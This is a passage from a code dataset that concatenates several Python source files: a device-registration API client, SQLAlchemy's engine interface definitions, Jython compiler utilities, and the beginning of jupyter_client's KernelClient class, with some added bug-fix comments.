        # list Python 2's filter() returns; both made this method raise.
        owner = next(iter(
            filter(lambda x: x['attribute'] == USER_ATTR,
                   system['systemav_set'])
        ))['value']
        if owner != self.username:
            return False
        # get description.
        # BUG FIX: filter() was previously called without its iterable.
        desc = next(iter(
            filter(lambda x: x['attribute'] == DESC_ATTR,
                   system['systemav_set'])
        ))['value']
        # find the dynamic interface and pull its MAC.
        query = {SYSTEM_QUERY_KEY: system['id']}
        ds = self.api_client.get(DYNINTR_ENDPOINT, query=query)
        # BUG FIX: the endpoint returns a list; take the first entry
        # instead of indexing the list with 'mac'.
        mac = ds[0]['mac']
        return {
            'id': system['id'],
            'description': desc,
            'mac': mac
        }

    def create(self, description, mac):
        """Register a new device: create the system, its attributes, and a
        dynamic interface; roll the system back if a later step fails."""
        mac = self.process_mac(mac)
        # generate a unique identifier for the system name
        m = md5()
        # encode so this also works on Python 3, where md5.update() needs
        # bytes (the MAC is hex digits, so ASCII-safe)
        m.update((mac + '-' + str(time())).encode('utf-8'))
        digest = m.hexdigest()
        # create the new system
        system_data = {
            'name': SYSTEM_NAME.format(digest),
            'ctnr': CTNR_ENDPOINT(settings.PUBLIC_CTNR_PK)
        }
        system_resp = self.api_client.post(SYSTEM_ENDPOINT, system_data)
        system_id = system_resp['id']
        # The entity field in the core/system/attributes endpoint is a
        # HyperlinkedRelatedField, so we have to send it the URL corresponding
        # to the system, instead of just a primary key.
        system_url = SYSTEM_DETAIL_ENDPOINT(system_id)
        try:
            # create other ID attribute
            other_id_data = {
                "entity": system_url,
                "attribute": USER_ATTR,
                "value": self.username
            }
            self.api_client.post(SYSTEM_ATTR_ENDPOINT, other_id_data)
            # create hardware type attribute
            hardware_type_data = {
                "entity": system_url,
                "attribute": DESC_ATTR,
                "value": description
            }
            self.api_client.post(SYSTEM_ATTR_ENDPOINT, hardware_type_data)
            # create dynamic intr
            interface_data = {
                "mac": mac,
                "range": DYNINTR_RANGE,
                "system": system_url,
                "workgroup": DYNINTR_WORKGROUP,
            }
            self.api_client.post(DYNINTR_ENDPOINT, interface_data)
        except urllib2.HTTPError:
            # roll back the half-created system before propagating
            self.delete(system_id)
            raise

    def update(self, pk, description, mac):
        """Update a device's description and MAC; returns False if the
        system is not owned by this user."""
        mac = self.process_mac(mac)
        # get the system
        system_data = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
        # make sure the interface is the user's
        owner = next(iter(
            filter(lambda x: x['attribute'] == USER_ATTR,
                   system_data['systemav_set'])
        ))['value']
        if owner != self.username:
            return False
        # get description url
        # id is a HyperlinkedIdentityField so we don't need to process it
        hardware_type_url = next(iter(
            filter(lambda x: x['attribute'] == DESC_ATTR,
                   system_data['systemav_set'])
        ))['id']
        # update hardware type (description)
        hardware_type_data = {"value": description}
        self.api_client.patch(hardware_type_url, pk=None,
                              data=hardware_type_data, verbatim=True)
        # find the dynamic interface and update its MAC
        interface_query = {SYSTEM_QUERY_KEY: system_data['id']}
        interface_data = self.api_client.get(DYNINTR_ENDPOINT,
                                             query=interface_query)[0]
        interface_update_data = {"mac": mac}
        self.api_client.patch(DYNINTR_ENDPOINT, pk=interface_data['id'],
                              data=interface_update_data)

    def delete(self, pk):
        """Delete a device by system pk; returns False if the system is
        not owned by this user."""
        # get the system
        system = self.api_client.get(SYSTEM_ENDPOINT, pk=pk)
        # make sure the interface is the user's
        if next(
            iter(filter(lambda x: x['attribute'] == USER_ATTR,
                        system['systemav_set']))
        )['value'] != self.username:
            return False
        # delete the system (the attrs and interface are deleted automatically)
        self.api_client.delete(SYSTEM_ENDPOINT, pk=pk)
| bsd-3-clause |
Drvanon/Game | venv/lib/python3.3/site-packages/sqlalchemy/engine/interfaces.py | 11 | 29197 | # engine/interfaces.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define core interfaces used by the engine system."""
from .. import util, event, events
class Dialect(object):
    """Define the behavior of a specific database and DB-API combination.

    Any aspect of metadata definition, SQL query generation,
    execution, result-set handling, or anything else which varies
    between databases is defined under the general category of the
    Dialect.  The Dialect acts as a factory for other
    database-specific object implementations including
    ExecutionContext, Compiled, DefaultGenerator, and TypeEngine.

    All Dialects implement the following attributes:

    name
      identifying name for the dialect from a DBAPI-neutral point of view
      (i.e. 'sqlite')

    driver
      identifying name for the dialect's DBAPI

    positional
      True if the paramstyle for this Dialect is positional.

    paramstyle
      the paramstyle to be used (some DB-APIs support multiple
      paramstyles).

    convert_unicode
      True if Unicode conversion should be applied to all ``str``
      types.

    encoding
      type of encoding to use for unicode, usually defaults to
      'utf-8'.

    statement_compiler
      a :class:`.Compiled` class used to compile SQL statements

    ddl_compiler
      a :class:`.Compiled` class used to compile DDL statements

    server_version_info
      a tuple containing a version number for the DB backend in use.
      This value is only available for supporting dialects, and is
      typically populated during the initial connection to the database.

    default_schema_name
      the name of the default schema.  This value is only available for
      supporting dialects, and is typically populated during the
      initial connection to the database.

    execution_ctx_cls
      a :class:`.ExecutionContext` class used to handle statement execution

    execute_sequence_format
      either the 'tuple' or 'list' type, depending on what cursor.execute()
      accepts for the second argument (they vary).

    preparer
      a :class:`~sqlalchemy.sql.compiler.IdentifierPreparer` class used to
      quote identifiers.

    supports_alter
      ``True`` if the database supports ``ALTER TABLE``.

    max_identifier_length
      The maximum length of identifier names.

    supports_unicode_statements
      Indicate whether the DB-API can receive SQL statements as Python
      unicode strings

    supports_unicode_binds
      Indicate whether the DB-API can receive string bind parameters
      as Python unicode strings

    supports_sane_rowcount
      Indicate whether the dialect properly implements rowcount for
      ``UPDATE`` and ``DELETE`` statements.

    supports_sane_multi_rowcount
      Indicate whether the dialect properly implements rowcount for
      ``UPDATE`` and ``DELETE`` statements when executed via
      executemany.

    preexecute_autoincrement_sequences
      True if 'implicit' primary key functions must be executed separately
      in order to get their value.  This is currently oriented towards
      Postgresql.

    implicit_returning
      use RETURNING or equivalent during INSERT execution in order to load
      newly generated primary keys and other column defaults in one execution,
      which are then available via inserted_primary_key.
      If an insert statement has returning() specified explicitly,
      the "implicit" functionality is not used and inserted_primary_key
      will not be available.

    dbapi_type_map
      A mapping of DB-API type objects present in this Dialect's
      DB-API implementation mapped to TypeEngine implementations used
      by the dialect.

      This is used to apply types to result sets based on the DB-API
      types present in cursor.description; it only takes effect for
      result sets against textual statements where no explicit
      typemap was present.

    colspecs
      A dictionary of TypeEngine classes from sqlalchemy.types mapped
      to subclasses that are specific to the dialect class.  This
      dictionary is class-level only and is not accessed from the
      dialect instance itself.

    supports_default_values
      Indicates if the construct ``INSERT INTO tablename DEFAULT
      VALUES`` is supported

    supports_sequences
      Indicates if the dialect supports CREATE SEQUENCE or similar.

    sequences_optional
      If True, indicates if the "optional" flag on the Sequence() construct
      should signal to not generate a CREATE SEQUENCE.  Applies only to
      dialects that support sequences.  Currently used only to allow Postgresql
      SERIAL to be used on a column that specifies Sequence() for usage on
      other backends.

    supports_native_enum
      Indicates if the dialect supports a native ENUM construct.
      This will prevent types.Enum from generating a CHECK
      constraint when that type is used.

    supports_native_boolean
      Indicates if the dialect supports a native boolean construct.
      This will prevent types.Boolean from generating a CHECK
      constraint when that type is used.

    """

    def create_connect_args(self, url):
        """Build DB-API compatible connection arguments.

        Given a :class:`~sqlalchemy.engine.url.URL` object, returns a tuple
        consisting of a `*args`/`**kwargs` suitable to send directly
        to the dbapi's connect function.

        """

        raise NotImplementedError()

    @classmethod
    def type_descriptor(cls, typeobj):
        """Transform a generic type to a dialect-specific type.

        Dialect classes will usually use the
        :func:`.types.adapt_type` function in the types module to
        accomplish this.

        The returned result is cached *per dialect class* so can
        contain no dialect-instance state.

        """

        raise NotImplementedError()

    def initialize(self, connection):
        """Called during strategized creation of the dialect with a
        connection.

        Allows dialects to configure options based on server version info or
        other properties.

        The connection passed here is a SQLAlchemy Connection object,
        with full capabilities.

        The initialize() method of the base dialect should be called via
        super().

        """

        pass

    def reflecttable(self, connection, table, include_columns=None):
        """Load table description from the database.

        Given a :class:`.Connection` and a
        :class:`~sqlalchemy.schema.Table` object, reflect its columns and
        properties from the database.  If include_columns (a list or
        set) is specified, limit the autoload to the given column
        names.

        The default implementation uses the
        :class:`~sqlalchemy.engine.reflection.Inspector` interface to
        provide the output, building upon the granular table/column/
        constraint etc. methods of :class:`.Dialect`.

        """

        raise NotImplementedError()

    def get_columns(self, connection, table_name, schema=None, **kw):
        """Return information about columns in `table_name`.

        Given a :class:`.Connection`, a string
        `table_name`, and an optional string `schema`, return column
        information as a list of dictionaries with these keys:

        name
          the column's name

        type
          [sqlalchemy.types#TypeEngine]

        nullable
          boolean

        default
          the column's default value

        autoincrement
          boolean

        sequence
          a dictionary of the form
              {'name' : str, 'start' :int, 'increment': int}

        Additional column attributes may be present.

        """

        raise NotImplementedError()

    def get_primary_keys(self, connection, table_name, schema=None, **kw):
        """Return information about primary keys in `table_name`.

        Deprecated.  This method is only called by the default
        implementation of :meth:`.Dialect.get_pk_constraint`.  Dialects should
        instead implement this method directly.

        """

        raise NotImplementedError()

    def get_pk_constraint(self, connection, table_name, schema=None, **kw):
        """Return information about the primary key constraint on
        table_name`.

        Given a :class:`.Connection`, a string
        `table_name`, and an optional string `schema`, return primary
        key information as a dictionary with these keys:

        constrained_columns
          a list of column names that make up the primary key

        name
          optional name of the primary key constraint.

        """
        raise NotImplementedError()

    def get_foreign_keys(self, connection, table_name, schema=None, **kw):
        """Return information about foreign_keys in `table_name`.

        Given a :class:`.Connection`, a string
        `table_name`, and an optional string `schema`, return foreign
        key information as a list of dicts with these keys:

        name
          the constraint's name

        constrained_columns
          a list of column names that make up the foreign key

        referred_schema
          the name of the referred schema

        referred_table
          the name of the referred table

        referred_columns
          a list of column names in the referred table that correspond to
          constrained_columns

        """

        raise NotImplementedError()

    def get_table_names(self, connection, schema=None, **kw):
        """Return a list of table names for `schema`."""

        raise NotImplementedError

    def get_view_names(self, connection, schema=None, **kw):
        """Return a list of all view names available in the database.

        schema:
          Optional, retrieve names from a non-default schema.

        """

        raise NotImplementedError()

    def get_view_definition(self, connection, view_name, schema=None, **kw):
        """Return view definition.

        Given a :class:`.Connection`, a string
        `view_name`, and an optional string `schema`, return the view
        definition.

        """

        raise NotImplementedError()

    def get_indexes(self, connection, table_name, schema=None, **kw):
        """Return information about indexes in `table_name`.

        Given a :class:`.Connection`, a string
        `table_name` and an optional string `schema`, return index
        information as a list of dictionaries with these keys:

        name
          the index's name

        column_names
          list of column names in order

        unique
          boolean

        """

        raise NotImplementedError()

    def normalize_name(self, name):
        """convert the given name to lowercase if it is detected as
        case insensitive.

        this method is only used if the dialect defines
        requires_name_normalize=True.

        """
        raise NotImplementedError()

    def denormalize_name(self, name):
        """convert the given name to a case insensitive identifier
        for the backend if it is an all-lowercase name.

        this method is only used if the dialect defines
        requires_name_normalize=True.

        """
        raise NotImplementedError()

    def has_table(self, connection, table_name, schema=None):
        """Check the existence of a particular table in the database.

        Given a :class:`.Connection` object and a string
        `table_name`, return True if the given table (possibly within
        the specified `schema`) exists in the database, False
        otherwise.

        """

        raise NotImplementedError()

    def has_sequence(self, connection, sequence_name, schema=None):
        """Check the existence of a particular sequence in the database.

        Given a :class:`.Connection` object and a string
        `sequence_name`, return True if the given sequence exists in
        the database, False otherwise.

        """

        raise NotImplementedError()

    def _get_server_version_info(self, connection):
        """Retrieve the server version info from the given connection.

        This is used by the default implementation to populate the
        "server_version_info" attribute and is called exactly
        once upon first connect.

        """

        raise NotImplementedError()

    def _get_default_schema_name(self, connection):
        """Return the string name of the currently selected schema from
        the given connection.

        This is used by the default implementation to populate the
        "default_schema_name" attribute and is called exactly
        once upon first connect.

        """

        raise NotImplementedError()

    def do_begin(self, dbapi_connection):
        """Provide an implementation of ``connection.begin()``, given a
        DB-API connection.

        The DBAPI has no dedicated "begin" method and it is expected
        that transactions are implicit.  This hook is provided for those
        DBAPIs that might need additional help in this area.

        Note that :meth:`.Dialect.do_begin` is not called unless a
        :class:`.Transaction` object is in use.  The
        :meth:`.Dialect.do_autocommit`
        hook is provided for DBAPIs that need some extra commands emitted
        after a commit in order to enter the next transaction, when the
        SQLAlchemy :class:`.Connection` is used in its default "autocommit"
        mode.

        :param dbapi_connection: a DBAPI connection, typically
         proxied within a :class:`.ConnectionFairy`.

        """

        raise NotImplementedError()

    def do_rollback(self, dbapi_connection):
        """Provide an implementation of ``connection.rollback()``, given
        a DB-API connection.

        :param dbapi_connection: a DBAPI connection, typically
         proxied within a :class:`.ConnectionFairy`.

        """

        raise NotImplementedError()

    def do_commit(self, dbapi_connection):
        """Provide an implementation of ``connection.commit()``, given a
        DB-API connection.

        :param dbapi_connection: a DBAPI connection, typically
         proxied within a :class:`.ConnectionFairy`.

        """

        raise NotImplementedError()

    def do_close(self, dbapi_connection):
        """Provide an implementation of ``connection.close()``, given a DBAPI
        connection.

        This hook is called by the :class:`.Pool` when a connection has been
        detached from the pool, or is being returned beyond the normal
        capacity of the pool.

        .. versionadded:: 0.8

        """

        raise NotImplementedError()

    def create_xid(self):
        """Create a two-phase transaction ID.

        This id will be passed to do_begin_twophase(),
        do_rollback_twophase(), do_commit_twophase().  Its format is
        unspecified.

        """

        raise NotImplementedError()

    def do_savepoint(self, connection, name):
        """Create a savepoint with the given name.

        :param connection: a :class:`.Connection`.
        :param name: savepoint name.

        """

        raise NotImplementedError()

    def do_rollback_to_savepoint(self, connection, name):
        """Rollback a connection to the named savepoint.

        :param connection: a :class:`.Connection`.
        :param name: savepoint name.

        """

        raise NotImplementedError()

    def do_release_savepoint(self, connection, name):
        """Release the named savepoint on a connection.

        :param connection: a :class:`.Connection`.
        :param name: savepoint name.

        """

        raise NotImplementedError()

    def do_begin_twophase(self, connection, xid):
        """Begin a two phase transaction on the given connection.

        :param connection: a :class:`.Connection`.
        :param xid: xid

        """

        raise NotImplementedError()

    def do_prepare_twophase(self, connection, xid):
        """Prepare a two phase transaction on the given connection.

        :param connection: a :class:`.Connection`.
        :param xid: xid

        """

        raise NotImplementedError()

    def do_rollback_twophase(self, connection, xid, is_prepared=True,
                             recover=False):
        """Rollback a two phase transaction on the given connection.

        :param connection: a :class:`.Connection`.
        :param xid: xid
        :param is_prepared: whether or not
         :meth:`.TwoPhaseTransaction.prepare` was called.
        :param recover: if the recover flag was passed.

        """

        raise NotImplementedError()

    def do_commit_twophase(self, connection, xid, is_prepared=True,
                           recover=False):
        """Commit a two phase transaction on the given connection.

        :param connection: a :class:`.Connection`.
        :param xid: xid
        :param is_prepared: whether or not
         :meth:`.TwoPhaseTransaction.prepare` was called.
        :param recover: if the recover flag was passed.

        """

        raise NotImplementedError()

    def do_recover_twophase(self, connection):
        """Recover list of uncommitted prepared two phase transaction
        identifiers on the given connection.

        :param connection: a :class:`.Connection`.

        """

        raise NotImplementedError()

    def do_executemany(self, cursor, statement, parameters, context=None):
        """Provide an implementation of ``cursor.executemany(statement,
        parameters)``."""

        raise NotImplementedError()

    def do_execute(self, cursor, statement, parameters, context=None):
        """Provide an implementation of ``cursor.execute(statement,
        parameters)``."""

        raise NotImplementedError()

    def do_execute_no_params(self, cursor, statement, parameters,
                             context=None):
        """Provide an implementation of ``cursor.execute(statement)``.

        The parameter collection should not be sent.

        """

        raise NotImplementedError()

    def is_disconnect(self, e, connection, cursor):
        """Return True if the given DB-API error indicates an invalid
        connection"""

        raise NotImplementedError()

    def connect(self):
        """return a callable which sets up a newly created DBAPI connection.

        The callable accepts a single argument "conn" which is the
        DBAPI connection itself.  It has no return value.

        This is used to set dialect-wide per-connection options such as
        isolation modes, unicode modes, etc.

        If a callable is returned, it will be assembled into a pool listener
        that receives the direct DBAPI connection, with all wrappers removed.

        If None is returned, no listener will be generated.

        """
        return None

    def reset_isolation_level(self, dbapi_conn):
        """Given a DBAPI connection, revert its isolation to the default."""

        raise NotImplementedError()

    def set_isolation_level(self, dbapi_conn, level):
        """Given a DBAPI connection, set its isolation level."""

        raise NotImplementedError()

    def get_isolation_level(self, dbapi_conn):
        """Given a DBAPI connection, return its isolation level."""

        raise NotImplementedError()
class ExecutionContext(object):
    """A messenger object for a Dialect that corresponds to a single
    execution.
    All methods below are abstract; each dialect supplies its own
    concrete ExecutionContext implementation.
    ExecutionContext should have these data members:
    connection
      Connection object which can be freely used by default value
      generators to execute SQL. This Connection should reference the
      same underlying connection/transactional resources of
      root_connection.
    root_connection
      Connection object which is the source of this ExecutionContext. This
      Connection may have close_with_result=True set, in which case it can
      only be used once.
    dialect
      dialect which created this ExecutionContext.
    cursor
      DB-API cursor procured from the connection,
    compiled
      if passed to constructor, sqlalchemy.engine.base.Compiled object
      being executed,
    statement
      string version of the statement to be executed. Is either
      passed to the constructor, or must be created from the
      sql.Compiled object by the time pre_exec() has completed.
    parameters
      bind parameters passed to the execute() method. For compiled
      statements, this is a dictionary or list of dictionaries. For
      textual statements, it should be in a format suitable for the
      dialect's paramstyle (i.e. dict or list of dicts for non
      positional, list or list of lists/tuples for positional).
    isinsert
      True if the statement is an INSERT.
    isupdate
      True if the statement is an UPDATE.
    should_autocommit
      True if the statement is a "committable" statement.
    prefetch_cols
      a list of Column objects for which a client-side default
      was fired off. Applies to inserts and updates.
    postfetch_cols
      a list of Column objects for which a server-side default or
      inline SQL expression value was fired off. Applies to inserts
      and updates.
    """
    def create_cursor(self):
        """Return a new cursor generated from this ExecutionContext's
        connection.
        Some dialects may wish to change the behavior of
        connection.cursor(), such as postgresql which may return a PG
        "server side" cursor.
        """
        raise NotImplementedError()
    def pre_exec(self):
        """Called before an execution of a compiled statement.
        If a compiled statement was passed to this ExecutionContext,
        the `statement` and `parameters` datamembers must be
        initialized after this statement is complete.
        """
        raise NotImplementedError()
    def post_exec(self):
        """Called after the execution of a compiled statement.
        If a compiled statement was passed to this ExecutionContext,
        the `last_insert_ids`, `last_inserted_params`, etc.
        datamembers should be available after this method completes.
        """
        raise NotImplementedError()
    def result(self):
        """Return a result object corresponding to this ExecutionContext.
        Returns a ResultProxy.
        """
        raise NotImplementedError()
    def handle_dbapi_exception(self, e):
        """Receive a DBAPI exception which occurred upon execute, result
        fetch, etc.
        :param e: the DBAPI exception instance raised.
        """
        raise NotImplementedError()
    def should_autocommit_text(self, statement):
        """Parse the given textual statement and return True if it refers to
        a "committable" statement.
        :param statement: a plain SQL string as passed to execute().
        """
        raise NotImplementedError()
    def lastrow_has_defaults(self):
        """Return True if the last INSERT or UPDATE row contained
        inlined or database-side defaults.
        """
        raise NotImplementedError()
    def get_rowcount(self):
        """Return the DBAPI ``cursor.rowcount`` value, or in some
        cases an interpreted value.
        See :attr:`.ResultProxy.rowcount` for details on this.
        """
        raise NotImplementedError()
class Compiled(object):
    """Represent a compiled SQL or DDL expression.
    The ``__str__`` method of the ``Compiled`` object should produce
    the actual text of the statement. ``Compiled`` objects are
    specific to their underlying database dialect, and also may
    or may not be specific to the columns referenced within a
    particular set of bind parameters. In no case should the
    ``Compiled`` object be dependent on the actual values of those
    bind parameters, even though it may reference those values as
    defaults.
    """
    def __init__(self, dialect, statement, bind=None,
                 compile_kwargs=util.immutabledict()):
        """Construct a new ``Compiled`` object.
        :param dialect: ``Dialect`` to compile against.
        :param statement: ``ClauseElement`` to be compiled, or ``None``.
        :param bind: Optional Engine or Connection to compile this
          statement against.
        :param compile_kwargs: additional kwargs that will be
          passed to the initial call to :meth:`.Compiled.process`.
        .. versionadded:: 0.8
        """
        self.dialect = dialect
        self.bind = bind
        if statement is not None:
            self.statement = statement
            self.can_execute = statement.supports_execution
            self.string = self.process(self.statement, **compile_kwargs)
        else:
            # Bug fix: previously these attributes were never assigned when
            # no statement was given, so __str__() and can_execute access
            # raised AttributeError instead of degrading gracefully.
            self.statement = None
            self.can_execute = False
            self.string = None
    @util.deprecated("0.7", ":class:`.Compiled` objects now compile "
                     "within the constructor.")
    def compile(self):
        """Produce the internal string representation of this element."""
        pass
    @property
    def sql_compiler(self):
        """Return a Compiled that is capable of processing SQL expressions.
        If this compiler is one, it would likely just return 'self'.
        """
        raise NotImplementedError()
    def process(self, obj, **kwargs):
        """Dispatch *obj* through the compiler visitor protocol and
        return the resulting string fragment."""
        return obj._compiler_dispatch(self, **kwargs)
    def __str__(self):
        """Return the string text of the generated SQL or DDL."""
        return self.string or ''
    def construct_params(self, params=None):
        """Return the bind params for this compiled object.
        :param params: a dict of string/object pairs whose values will
          override bind values compiled in to the
          statement.
        """
        raise NotImplementedError()
    @property
    def params(self):
        """Return the bind params for this compiled object."""
        return self.construct_params()
    def execute(self, *multiparams, **params):
        """Execute this compiled object.
        Raises :class:`.UnboundExecutionError` if no Engine or
        Connection was bound at construction time.
        """
        e = self.bind
        if e is None:
            raise exc.UnboundExecutionError(
                "This Compiled object is not bound to any Engine "
                "or Connection.")
        return e._execute_compiled(self, multiparams, params)
    def scalar(self, *multiparams, **params):
        """Execute this compiled object and return the result's
        scalar value."""
        return self.execute(*multiparams, **params).scalar()
class TypeCompiler(object):
    """Produces DDL specification for TypeEngine objects."""
    def __init__(self, dialect):
        # Dialect this type compiler generates DDL strings for.
        self.dialect = dialect
    def process(self, type_):
        # Visitor protocol: the type object dispatches back into this
        # compiler based on its own visit name.
        return type_._compiler_dispatch(self)
class Connectable(object):
    """Interface for an object which supports execution of SQL constructs.
    The two implementations of :class:`.Connectable` are
    :class:`.Connection` and :class:`.Engine`.
    Connectable must also implement the 'dialect' member which references a
    :class:`.Dialect` instance.
    """
    # Event dispatch hook for connection-level events.
    dispatch = event.dispatcher(events.ConnectionEvents)
    def connect(self, **kwargs):
        """Return a :class:`.Connection` object.
        Depending on context, this may be ``self`` if this object
        is already an instance of :class:`.Connection`, or a newly
        procured :class:`.Connection` if this object is an instance
        of :class:`.Engine`.
        """
        # NOTE(review): no body here -- the base method implicitly returns
        # None; subclasses are expected to override.
    def contextual_connect(self):
        """Return a :class:`.Connection` object which may be part of an ongoing
        context.
        Depending on context, this may be ``self`` if this object
        is already an instance of :class:`.Connection`, or a newly
        procured :class:`.Connection` if this object is an instance
        of :class:`.Engine`.
        """
        raise NotImplementedError()
    @util.deprecated("0.7",
                     "Use the create() method on the given schema "
                     "object directly, i.e. :meth:`.Table.create`, "
                     ":meth:`.Index.create`, :meth:`.MetaData.create_all`")
    def create(self, entity, **kwargs):
        """Emit CREATE statements for the given schema entity."""
        raise NotImplementedError()
    @util.deprecated("0.7",
                     "Use the drop() method on the given schema "
                     "object directly, i.e. :meth:`.Table.drop`, "
                     ":meth:`.Index.drop`, :meth:`.MetaData.drop_all`")
    def drop(self, entity, **kwargs):
        """Emit DROP statements for the given schema entity."""
        raise NotImplementedError()
    def execute(self, object, *multiparams, **params):
        """Executes the given construct and returns a :class:`.ResultProxy`."""
        raise NotImplementedError()
    def scalar(self, object, *multiparams, **params):
        """Executes and returns the first column of the first row.
        The underlying cursor is closed after execution.
        """
        raise NotImplementedError()
    def _run_visitor(self, visitorcallable, element,
                     **kwargs):
        # Internal: apply a schema visitor to the given element.
        raise NotImplementedError()
    def _execute_clauseelement(self, elem, multiparams=None, params=None):
        # Internal: execute a ClauseElement construct.
        raise NotImplementedError()
| apache-2.0 |
fitermay/intellij-community | python/lib/Lib/compiler/misc.py | 100 | 1806 |
def flatten(tup):
    """Recursively flatten nested tuples into a flat list of elements.
    Only tuples are descended into; any other container (e.g. a list)
    is kept as a single element.
    """
    flat = []
    for item in tup:
        if isinstance(item, tuple):
            flat.extend(flatten(item))
        else:
            flat.append(item)
    return flat
class Set:
    """A minimal set type backed by a dict, predating the builtin ``set``.
    Elements map to themselves in the underlying dict, preserving the
    historical behavior of this compiler-internal helper.
    """
    def __init__(self):
        self.elts = {}
    def __len__(self):
        return len(self.elts)
    def __contains__(self, elt):
        # Bug fix for Python 3: dict.has_key() was removed; the `in`
        # operator is equivalent and works on Python 2 as well.
        return elt in self.elts
    def add(self, elt):
        self.elts[elt] = elt
    def elements(self):
        # list() keeps the historical list return type on Python 3,
        # where dict.keys() is a view object.
        return list(self.elts.keys())
    def has_elt(self, elt):
        return elt in self.elts
    def remove(self, elt):
        del self.elts[elt]
    def copy(self):
        # Shallow copy: a new Set sharing the same element objects.
        c = Set()
        c.elts.update(self.elts)
        return c
class Stack:
    """A simple LIFO stack over a list, with indexed read access."""
    def __init__(self):
        self.stack = []
    def __len__(self):
        return len(self.stack)
    def __getitem__(self, index):  # needed by visitContinue()
        return self.stack[index]
    def push(self, elt):
        """Append *elt* to the top of the stack."""
        self.stack.append(elt)
    def pop(self, index=-1):
        """Remove and return the element at *index* (default: the top),
        mirroring ``list.pop``."""
        return self.stack.pop(index)
    def top(self):
        """Return (without removing) the element on top of the stack."""
        return self.stack[-1]
MANGLE_LEN = 256 # magic constant from compile.c
def mangle(name, klass):
    """Apply CPython private-name mangling: ``__name`` inside class
    ``Klass`` becomes ``_Klass__name``.
    Names that are not private, are dunder names, or would exceed the
    compiler's MANGLE_LEN limit are returned unchanged, matching the
    behavior of compile.c.
    """
    if not name.startswith('__'):
        return name
    if len(name) + 2 >= MANGLE_LEN:
        return name
    if name.endswith('__'):
        return name
    # Leading underscores of the class name are dropped; a class name
    # made only of underscores disables mangling entirely.
    stripped = klass.lstrip('_')
    if not stripped:
        return name
    total = len(stripped) + len(name)
    if total > MANGLE_LEN:
        stripped = stripped[:MANGLE_LEN - total]
    return "_%s%s" % (stripped, name)
def set_filename(filename, tree):
    """Stamp *filename* onto every node reachable from *tree*.
    Performs a breadth-first walk via getChildNodes(), assigning the
    ``filename`` attribute on each node visited.
    """
    queue = [tree]
    while queue:
        current = queue.pop(0)
        current.filename = filename
        queue.extend(current.getChildNodes())
| apache-2.0 |
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/jupyter_client/client.py | 5 | 15619 | """Base class to manage the interaction with a running kernel"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import
from jupyter_client.channels import major_protocol_version
from ipython_genutils.py3compat import string_types, iteritems
import zmq
from traitlets import (
Any, Instance, Type,
)
from .channelsabc import (ChannelABC, HBChannelABC)
from .clientabc import KernelClientABC
from .connect import ConnectionFileMixin
# some utilities to validate message structure, these might get moved elsewhere
# if they prove to have more generic utility
def validate_string_dict(dct):
    """Check that *dct* maps strings to strings.
    Raises ValueError naming the first offending key or value.
    """
    for key, value in iteritems(dct):
        if not isinstance(key, string_types):
            raise ValueError('key %r in dict must be a string' % key)
        if not isinstance(value, string_types):
            raise ValueError('value %r in dict must be a string' % value)
class KernelClient(ConnectionFileMixin):
    """Communicates with a single kernel on any host via zmq channels.
    There are four channels associated with each kernel:
    * shell: for request/reply calls to the kernel.
    * iopub: for the kernel to publish results to frontends.
    * hb: for monitoring the kernel's heartbeat.
    * stdin: for frontends to reply to raw_input calls in the kernel.
    The messages that can be sent on these channels are exposed as methods of the
    client (KernelClient.execute, complete, history, etc.). These methods only
    send the message, they don't wait for a reply. To get results, use e.g.
    :meth:`get_shell_msg` to fetch messages from the shell channel.
    """
    # The PyZMQ Context to use for communication with the kernel.
    context = Instance(zmq.Context)
    def _context_default(self):
        return zmq.Context.instance()
    # The classes to use for the various channels
    shell_channel_class = Type(ChannelABC)
    iopub_channel_class = Type(ChannelABC)
    stdin_channel_class = Type(ChannelABC)
    hb_channel_class = Type(HBChannelABC)
    # Protected traits
    # Channel instances are created lazily by the corresponding
    # properties below; None until first access.
    _shell_channel = Any()
    _iopub_channel = Any()
    _stdin_channel = Any()
    _hb_channel = Any()
    # flag for whether execute requests should be allowed to call raw_input:
    allow_stdin = True
    #--------------------------------------------------------------------------
    # Channel proxy methods
    #--------------------------------------------------------------------------
    def get_shell_msg(self, *args, **kwargs):
        """Get a message from the shell channel"""
        return self.shell_channel.get_msg(*args, **kwargs)
    def get_iopub_msg(self, *args, **kwargs):
        """Get a message from the iopub channel"""
        return self.iopub_channel.get_msg(*args, **kwargs)
    def get_stdin_msg(self, *args, **kwargs):
        """Get a message from the stdin channel"""
        return self.stdin_channel.get_msg(*args, **kwargs)
    #--------------------------------------------------------------------------
    # Channel management methods
    #--------------------------------------------------------------------------
    def start_channels(self, shell=True, iopub=True, stdin=True, hb=True):
        """Starts the channels for this kernel.
        This will create the channels if they do not exist and then start
        them (their activity runs in a thread). If port numbers of 0 are
        being used (random ports) then you must first call
        :meth:`start_kernel`. If the channels have been stopped and you
        call this, :class:`RuntimeError` will be raised.
        """
        if shell:
            self.shell_channel.start()
            # Immediately request kernel info; the reply drives protocol
            # version adaptation (see _handle_kernel_info_reply).
            self.kernel_info()
        if iopub:
            self.iopub_channel.start()
        if stdin:
            self.stdin_channel.start()
            self.allow_stdin = True
        else:
            # Without a stdin channel the kernel must not issue
            # input requests to this client.
            self.allow_stdin = False
        if hb:
            self.hb_channel.start()
    def stop_channels(self):
        """Stops all the running channels for this kernel.
        This stops their event loops and joins their threads.
        """
        if self.shell_channel.is_alive():
            self.shell_channel.stop()
        if self.iopub_channel.is_alive():
            self.iopub_channel.stop()
        if self.stdin_channel.is_alive():
            self.stdin_channel.stop()
        if self.hb_channel.is_alive():
            self.hb_channel.stop()
    @property
    def channels_running(self):
        """Are any of the channels created and running?"""
        return (self.shell_channel.is_alive() or self.iopub_channel.is_alive() or
                self.stdin_channel.is_alive() or self.hb_channel.is_alive())
    ioloop = None  # Overridden in subclasses that use pyzmq event loop
    @property
    def shell_channel(self):
        """Get the shell channel object for this kernel."""
        if self._shell_channel is None:
            url = self._make_url('shell')
            self.log.debug("connecting shell channel to %s", url)
            socket = self.connect_shell(identity=self.session.bsession)
            self._shell_channel = self.shell_channel_class(
                socket, self.session, self.ioloop
            )
        return self._shell_channel
    @property
    def iopub_channel(self):
        """Get the iopub channel object for this kernel."""
